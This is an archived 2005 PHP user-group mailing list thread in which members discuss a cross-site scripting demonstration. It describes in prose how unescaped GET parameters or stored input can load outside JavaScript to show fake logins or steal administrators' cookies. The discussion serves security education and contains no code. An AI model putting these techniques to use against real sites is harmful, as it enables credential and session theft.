NYCPHP Meetup

NYPHP.org

[nycphp-talk] PHP Pentration Discussion

inforequest 1j0lkq002 at sneakemail.com
Sat May 28 11:33:56 EDT 2005 

I think Rasmus' example was a cross-site scripting example, not stealing cookies. 

The faulty web page was coded to build a form based on incoming parameters in the GET string.  So Rasmus ADDED encoded stuff to that GET string, with a script from Rasmus' own website somewhere else. When the faulty page parsed the incoming GET it also followed Rasmus' added instructions, which loaded javascript from another webserver somewhere else. 

That other-site script could be a fake login that collects usernames/passwords. Easier than hacking cookies.




-----Original Message-----
From: 
	"Jose Villegas jv_nyphp-at-duikerbok.com |nyphp dev/internal group use|" <...>
Sent: May 28, 2005 11:21 AM
To: NYPHP Talk <talk at lists.nyphp.org>
Subject: Re: [nycphp-talk] PHP Pentration Discussion

The site in question wasn't escaping characters submitted by a user so 
a person could submit html code which manipulated the markup of the 
response page.

One question: Rasmus mentions that he can trick people into sending 
their user names and passwords. I'm assuming he meant he could do this 
with the hack he demonstrated. But if he goes to a website and does 
this, how does he have access to another person's user names and 
passwords? Isn't he only manipulating the response page which only he 
is seeing?

I'm guessing if he submits his "name" which contains html code, the 
name is stored in a database and retrieved by an administrator, 
javascript could be inserted which could grab cookie values (for 
example) from the administrator. Something similar could be done if the 
name is posted to a bulletin board or a similar web application.

Would there be any other vulnerabilities?

jose

On May 28, 2005, at 1:25 AM, Hans Zaunere wrote:
> For those not on the PHP-General list, a good thread has recently been 
> developing where Rasmus showed some interesting examples and 
> discussion of cross-site scripting vulnerabilities.
>
> Follow the thread
> http://marc.theaimsgroup.com/?t=111721168800001&r=1&w=2
>
> And Rasmus' first post:
> http://marc.theaimsgroup.com/?l=php-general&m=111722197717368&w=2
> ...

More information about the talk mailing list